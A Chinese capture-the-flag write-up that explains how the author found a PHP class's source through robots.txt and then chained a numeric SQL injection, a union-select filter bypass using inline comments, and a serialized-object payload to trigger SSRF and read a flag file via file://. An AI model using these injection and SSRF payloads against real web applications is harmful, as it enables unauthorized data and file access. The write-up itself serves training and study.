访问 /robots.txt 发现备份文件,下载下来得到源码。
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}显然 get() 方法里面存在一个 SSRF 漏洞,传入的参数值是当前用户的博客。
同时在 view.php 存在 sql 注入
先尝试sql注入看看能不能读取数据库信息吧。经过测试应该是个数字型的注入,不需要引号闭合。
测列数:
一共是4列,接下来去联合注入,但是存在过滤。
使用内联注释成功绕过:
1/**/union/**/select/**/2,3,4,5
从回显的信息来看应该是将查询到的blog的内容传入getBlogContents方法,幸运地是这个查询的内容我们可控,只要联合查询字符串就好,而不是数字。那接下来的思路就是查询一个字符串,然后这个字符串传入 getBlogContents 方法,然后传递到get 方法,最后通过 ssrf 读取文件。
note:细节的一点是回显信息中有一个反序列化,合理的猜测是数据库里面存的是序列化后的数据,取出来再反序列化,我们试着把blog字段根据源码中的UserInfo类序列化然后查询。这里直接一步到位读取flag
-1/**/union/**/select/**/2,3,4,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'以上的手法是官方wp的操作,然而完全不用这么麻烦,查询当前用户就可以知道我们是root。紧接着尝试load_file发现可以读取到view.php,那么直接在同目录下以及根目录下尝试一会就可以读到flag了
8180
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
